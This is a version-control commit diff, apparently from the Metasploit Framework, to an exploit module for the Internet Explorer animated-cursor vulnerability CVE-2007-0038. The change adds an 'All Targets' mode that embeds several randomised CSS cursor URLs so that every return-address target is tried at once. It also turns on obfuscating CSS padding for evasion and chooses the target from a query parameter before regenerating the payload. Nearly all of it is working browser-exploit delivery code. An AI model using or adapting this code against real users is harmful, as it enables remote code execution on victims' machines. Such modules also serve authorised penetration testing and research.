This module now defaults to using all targets at once :-)
git-svn-id: file:///home/svn/framework3/trunk@4596 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e707423987
commit
24ba17aceb
|
@ -71,6 +71,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
#
|
||||
# Use multiple cursor URLs to try all targets at once
|
||||
# This can result in multiple, sequential sessions
|
||||
#
|
||||
[ 'All Targets', { }],
|
||||
|
||||
#
|
||||
# The following targets use call [ebx+4], just like the original exploit
|
||||
#
|
||||
|
@ -118,37 +124,57 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
targ = nil
|
||||
exts = ['bmp', 'wav', 'png', 'zip', 'tar']
|
||||
gext = exts[rand(exts.length)]
|
||||
mext = request.uri =~ /\.(...)$/
|
||||
|
||||
ruri, qstr = request.uri.split('?')
|
||||
|
||||
if (qstr and qstr =~ /.*=(\d+)/)
|
||||
targ = $1.to_i
|
||||
end
|
||||
|
||||
mext = ruri =~ /\.(...)$/
|
||||
if (not (mext and exts.include?($1)))
|
||||
|
||||
html =
|
||||
"<html><head><title>" + rand_text_alphanumeric(rand(128)+4) +
|
||||
"</title></head><body>" + rand_text_english(rand(1024)+1) +
|
||||
"<div style='" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("cursor") +
|
||||
generate_css_padding() +
|
||||
":" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("url(") +
|
||||
generate_css_padding() +
|
||||
'"' +
|
||||
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
||||
'"' +
|
||||
generate_css_padding() +
|
||||
");" +
|
||||
generate_css_padding() +
|
||||
"'>" +
|
||||
generate_padding() +
|
||||
"</div>"
|
||||
"<html><head><title>" +
|
||||
rand_text_alphanumeric(rand(128)+4) +
|
||||
"</title>" +
|
||||
"</head><body>" + rand_text_alphanumeric(rand(128)+1)
|
||||
|
||||
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
||||
|
||||
mytargs.each_index do |i|
|
||||
html << "<div style='" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("cursor") +
|
||||
generate_css_padding() +
|
||||
":" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("url(") +
|
||||
generate_css_padding() +
|
||||
'"' +
|
||||
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
||||
"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
|
||||
'"' +
|
||||
generate_css_padding() +
|
||||
");" +
|
||||
generate_css_padding() +
|
||||
"'>" +
|
||||
generate_padding() +
|
||||
"</div>"
|
||||
end
|
||||
|
||||
send_response_html(cli, html)
|
||||
return
|
||||
end
|
||||
|
||||
# Set the requested target
|
||||
if (targ and targets[targ])
|
||||
target = targets[targ]
|
||||
end
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
|
@ -250,8 +276,6 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def generate_css_padding
|
||||
return ''
|
||||
|
||||
buf =
|
||||
generate_whitespace() +
|
||||
"/*" +
|
||||
|
|
Loading…
Reference in New Issue